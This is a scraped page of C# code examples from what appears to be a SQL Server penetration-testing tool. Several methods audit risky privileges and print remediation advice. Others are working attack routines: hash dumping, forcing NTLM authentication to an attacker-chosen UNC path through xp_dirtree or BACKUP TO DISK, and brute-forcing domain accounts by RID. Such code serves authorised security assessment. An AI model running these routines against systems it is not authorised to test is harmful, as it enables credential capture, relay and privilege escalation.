Exemplo n.º 1
0
        internal override bool Query()
        {
            SQLServerInfo i = new SQLServerInfo(credentials);

            i.SetInstance(instance);
            i.Query();
            var info = i.GetResults();

            List <string> principals = new List <string>();

            SetPrincipalNameFilter(info.Currentlogin);
            base.Query();
            foreach (var s in serverRoles)
            {
                principals.Add(s.PrincipalName);
            }
            principals.Add(info.Currentlogin);
            principals.Add("Public");

            SQLDatabaseRoleMember roleMember = new SQLDatabaseRoleMember(credentials);

            roleMember.SetRolePrincipalNameFilter(role);
            roleMember.SetInstance(instance);
            SQLDatabase database = new SQLDatabase(credentials);

            database.SetInstance(instance);

            foreach (var principal in principals)
            {
                roleMember.SetPrincipalNameFilter(principal);
                foreach (var db in database.GetResults())
                {
                    if (db.is_trustworthy_on && (bool)db.OwnerIsSysadmin)
                    {
                        roleMember.SetDatabase(db.DatabaseName);
                        roleMember.Query();
                        foreach (var r in roleMember.GetResults())
                        {
                            var s = new DbOwner
                            {
                                ComputerName  = computerName,
                                Instance      = instance,
                                Vulnerability = string.Format("Database Role - {0}", role),
                                Description   = string.Format("The login has the {0} role in one or more databases.  This may allow the login to escalate privileges to sysadmin if the affected databases are trusted and owned by a sysadmin.", role),
                                Remediation   = string.Format("If the permission is not required remove it.  Permissions are granted with a command like: EXEC sp_addrolemember \'{0}\', \'MyDbUser\', and can be removed with a command like:  EXEC sp_droprolemember \'{0}\', \'MyDbUser\'", role),
                                Severity      = "Medium",
                                IsVulnerable  = "Yes",
                                IsExploitable = "Unknown",
                                Exploited     = "No",
                                ExploitCmd    = "",
                                Reference     = @"https://msdn.microsoft.com/en-us/library/ms189121.aspx, https://msdn.microsoft.com/en-us/library/ms187861.aspx",
                                Details       = string.Format("The {0} database is set as trustworthy and is owned by a sysadmin. This is exploitable.", database)
                            };
                            spExecuteAs.Add(s);
                        }
                    }
                }
            }
            return(true);
        }
Exemplo n.º 2
0
        internal override bool Query()
        {
            string query1_1 = string.Format(
                "SELECT  \'{0}\' as [ComputerName],\n" +
                "\'{1}\' as [Instance],",
                computerName, instance);

            int versionShort = 0;

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                SQLServerInfo serverInfo = new SQLServerInfo(credentials);
                serverInfo.SetInstance(instance);
                if (!serverInfo.Query())
                {
                    return(false);
                }
                SQLServerInfo.Details details = serverInfo.GetResults();

                int.TryParse(details.SQLServerMajorVersion.Split('.').First(), out versionShort);

                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(query1_2);
                if (versionShort > 10)
                {
                    sb.Append(query1_3);
                }
                sb.Append(query1_4);

                if (!string.IsNullOrEmpty(databaseFilter))
                {
                    sb.Append(databaseFilter);
                }
                if (!string.IsNullOrEmpty(noDefaultsFilter))
                {
                    sb.Append(noDefaultsFilter);
                }
                if (!string.IsNullOrEmpty(hasAccessFilter))
                {
                    sb.Append(hasAccessFilter);
                }
                if (!string.IsNullOrEmpty(sysAdminFilter))
                {
                    sb.Append(sysAdminFilter);
                }
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                databases = sql.Query <Database>(sb.ToString(), new Database());
            }
            return(true);
        }
Exemplo n.º 3
0
        internal override bool Query()
        {
            SQLServerInfo i = new SQLServerInfo(credentials);

            i.SetInstance(instance);
            i.Query();
            var info = i.GetResults();

            SetPermissionNameFilter("IMPERSONATE");
            base.Query();

            using (SQLConnection sql = new SQLConnection())
            {
                sql.BuildConnectionString(credentials);
                sql.Connect();
                foreach (var j in serverPrivileges)
                {
                    string query = string.Format("SELECT IS_SRVROLEMEMBER(\'sysadmin\', \'{0}\') as Status", j.ObjectName);
                    foreach (var r in sql.Query(query).AsEnumerable())
                    {
                        if (!(r["Status"] is DBNull) && 1 == (int)r["Status"])
                        {
                            var s = new Impersonate
                            {
                                ComputerName  = computerName,
                                Instance      = instance,
                                Vulnerability = "Excessive Privilege - Impersonate Login",
                                Description   = "The current SQL Server login can impersonate other logins.  This may allow an authenticated login to gain additional privileges.",
                                Remediation   = "Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user]",
                                Severity      = "High",
                                IsVulnerable  = "Yes",
                                IsExploitable = "Unknown",
                                Exploited     = "No",
                                ExploitCmd    = "",
                                Reference     = @"https://msdn.microsoft.com/en-us/library/ms181362.aspx",
                                Details       = string.Format("{0} can impersonate the {1} SYSADMIN login. This test was ran with the {2} login.", j.GranteeName, j.ObjectName, info.Currentlogin)
                            };
                            impersonates.Add(s);
                        }
                    }
                }
            }
            return(true);
        }
Exemplo n.º 4
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                if (!SQLSysadminCheck.Query(instance, computerName, credentials))
                {
                    Console.WriteLine("[-] User is not Sysadmin");
                    return(false);
                }

                SQLServerInfo i = new SQLServerInfo(credentials);
                i.SetInstance(instance);
                i.Query();
                SQLServerInfo.Details d = i.GetResults();

                int versionShort;
                if (!int.TryParse(d.SQLServerMajorVersion.Split('.').First(), out versionShort))
                {
                    Console.WriteLine("[-] Unable to ascertain SQL Version");
                    Console.WriteLine("[*] It is possible to override this with the --version flag");
                    return(false);
                }

                string query = string.Empty;
                if (8 < versionShort)
                {
                    query = QUERY1_1;
                }
                else
                {
                    query = QUERY2_1;
                }

                //table = sql.Query(query);
                hashes = sql.Query <Hash>(query, new Hash());
            }
            return(false);
        }
Exemplo n.º 5
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (sql.Connect())
                {
                    SQLServerInfo i = new SQLServerInfo(credentials);
                    i.SetInstance(instance);
                    i.Query();
                    SQLServerInfo.Details d = i.GetResults();

                    int versionShort;
                    if (!int.TryParse(d.SQLServerMajorVersion.Split('.').First(), out versionShort))
                    {
                        Console.WriteLine("[-] Unable to ascertain SQL Version");
                        Console.WriteLine("[*] It is possible to override this with the --version flag");
                        return(false);
                    }

                    string query1 = string.Empty;
                    string query2 = string.Empty;
                    if (11 > versionShort)
                    {
                        query1 = string.Format("BACKUP LOG [TESTING] TO DISK = \'{0}\'", uncpath);
                        query2 = string.Format("BACKUP DATABASE [TESTING] TO DISK = \'{0}\'", uncpath);
                    }
                    else
                    {
                        query1 = string.Format("xp_dirtree \'{0}\'", uncpath);
                        query2 = string.Format("xp_fileexist \'{0}\'", uncpath);
                    }

                    _Query(sql, query1);
                    _Query(sql, query2);
                }
            }
            return(true);
        }
        internal override bool Query()
        {
            SQLServerInfo i = new SQLServerInfo(credentials);

            i.SetInstance(instance);
            i.Query();
            var info = i.GetResults();

            SQLDatabase db = new SQLDatabase(credentials);

            db.EnableHasAccessFilter();
            db.Query();
            SQLDatabasePriv priv = new SQLDatabasePriv(credentials);

            priv.SetInstance(instance);
            priv.SetPermissionNameFilter("CREATE PROCEDURE");
            var dbPrivs = new List <SQLDatabasePriv.DatabasePrivilege>();

            foreach (var d in db.GetResults())
            {
                priv.SetDatabase(d.DatabaseName);
                priv.Query();
                foreach (var pr in priv.GetResults())
                {
                    dbPrivs.Add(pr);
                }
            }

            List <string> principals = new List <string>();

            SetPrincipalNameFilter(info.Currentlogin);
            base.Query();
            foreach (var s in serverRoles)
            {
                principals.Add(s.PrincipalName);
            }
            principals.Add(info.Currentlogin);
            principals.Add("Public");


            priv.SetPermissionNameFilter("ALTER");
            priv.SetPermissionTypeFilter("SCHEMA");
            foreach (string principal in principals)
            {
                priv.SetPrincipalNameFilter(principal);
                foreach (var dbp in dbPrivs)
                {
                    priv.SetDatabase(dbp.DatabaseName);
                    priv.Query();
                    foreach (var asPriv in priv.GetResults())
                    {
                        if (dbp.PrincipalName.Contains(principal))
                        {
                            var s = new XpDirTree
                            {
                                ComputerName  = computerName,
                                Instance      = instance,
                                Vulnerability = "Permission - CREATE PROCEDURE",
                                Description   = "The login has privileges to create stored procedures in one or more databases.  This may allow the login to escalate privileges within the database.",
                                Remediation   = "If the permission is not required remove it.  Permissions are granted with a command like: GRANT CREATE PROCEDURE TO user, and can be removed with a command like: REVOKE CREATE PROCEDURE TO user",
                                Severity      = "Medium",
                                IsVulnerable  = "Yes",
                                IsExploitable = "Unknown",
                                Exploited     = "No",
                                ExploitCmd    = "No exploit is currently available that will allow the current user to become a sysadmin.",
                                Reference     = @"https://msdn.microsoft.com/en-us/library/ms187926.aspx?f=255&MSPPError=-2147217396",
                                Details       = string.Format("The {0} principal has EXECUTE privileges on the {1} procedure in the master database.", principal, xp)
                            };
                            spExecuteAs.Add(s);
                        }
                    }
                }
            }
            return(true);
        }
Exemplo n.º 7
0
        internal override bool Query()
        {
            SQLServerInfo i = new SQLServerInfo(credentials);

            i.SetInstance(instance);
            i.Query();
            var info = i.GetResults();

            List <string> principals = new List <string>();

            SetPrincipalNameFilter(info.Currentlogin);
            base.Query();
            foreach (var s in serverRoles)
            {
                principals.Add(s.PrincipalName);
            }
            principals.Add(info.Currentlogin);
            principals.Add("Public");

            SQLDatabasePriv p = new SQLDatabasePriv(credentials);

            p.SetInstance(instance);
            p.SetDatabase("master");
            p.SetPermissionNameFilter("EXECUTE");
            p.Query();

            var dirTree = new List <SQLDatabasePriv.DatabasePrivilege>();

            foreach (var priv in p.GetResults())
            {
                if (!string.IsNullOrEmpty(priv.ObjectName) && priv.ObjectName.Contains(xp) && priv.StateDescription.Contains("grant"))
                {
                    dirTree.Add(priv);
                }
            }

            foreach (var r in dirTree)
            {
                if (r.PrincipalName.Contains("public") || principals.Contains(r.PrincipalName))
                {
                    var s = new XpDirTree
                    {
                        ComputerName  = computerName,
                        Instance      = instance,
                        Vulnerability = string.Format("Excessive Privilege - Execute {0}", xp),
                        Description   = string.Format("{0} is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. {0} can be used to force the SQL Server service account to authenticate to a remote attacker.  The service account password hash can then be captured + cracked or relayed to gain unauthorized access to systems. This also means {0} can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used.  Thats because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default.", xp),
                        Remediation   = string.Format("Remove EXECUTE privileges on the {0} procedure for non administrative logins and roles.  Example command: REVOKE EXECUTE ON {0} to Public.", xp),
                        Severity      = "Medium",
                        IsVulnerable  = "Yes",
                        IsExploitable = "Unknown",
                        Exploited     = "No",
                        ExploitCmd    = "Crack the password hash offline or relay it to another system.",
                        Reference     = @"https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/",
                        Details       = string.Format("The {0} principal has EXECUTE privileges on the {1} procedure in the master database.", r.PrincipalName, xp)
                    };
                    spExecuteAs.Add(s);
                }
            }

            return(true);
        }
Exemplo n.º 8
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                SQLServerInfo info = new SQLServerInfo(credentials);
                info.SetInstance(instance);
                info.Query();
                SQLServerInfo.Details d = info.GetResults();

                domainName = d.DomainName;

                string query1_1 = string.Format("SELECT SUSER_SID(\'{0}\\{1}\') as DomainGroupSid", domainName, domainGroup);
#if DEBUG
                Console.WriteLine(query1_1);
#endif
                DataTable table    = sql.Query(query1_1);
                byte[]    sidBytes = (byte[])table.AsEnumerable().First()["DomainGroupSid"];
                string    strSid   = BitConverter.ToString(sidBytes).Replace("-", "").Substring(0, 48);

                Console.WriteLine("Base SID: {0}", strSid);

                for (int i = start; i <= end; i++)
                {
                    string strHexI  = i.ToString("x");
                    int    nStrHexI = strHexI.Length;
                    string rid      = strHexI;
                    if (0 != nStrHexI % 2)
                    {
                        rid = "0" + strHexI;
                    }

                    string[] arrSplit = Split(rid, 2).ToArray();
                    Array.Reverse(arrSplit);
                    rid = string.Join("", arrSplit);
                    rid = rid.PadRight(8, '0');
                    rid = "0x" + strSid + rid;

                    string query2_1 = string.Format("SELECT SUSER_SNAME({0}) as [DomainAccount]", rid);
#if DEBUG
                    Console.WriteLine(query2_1);
#endif
                    table = sql.Query(query2_1);

                    foreach (DataRow row in table.AsEnumerable())
                    {
                        try
                        {
                            if (row["DomainAccount"] is DBNull)
                            {
                                continue;
                            }

                            Fuzz f = new Fuzz
                            {
                                ComputerName  = computerName,
                                Instance      = instance,
                                SID           = rid,
                                RID           = i,
                                DomainAccount = (string)row["DomainAccount"],
                            };
                            fuzzed.Add(f);
                        }
                        catch (Exception ex)
                        {
                            if (ex is ArgumentNullException)
                            {
                                continue;
                            }
                            else
                            {
                                Console.WriteLine(ex.Message);
                            }
                            return(false);
                        }
                    }
                }
            }
            return(true);
        }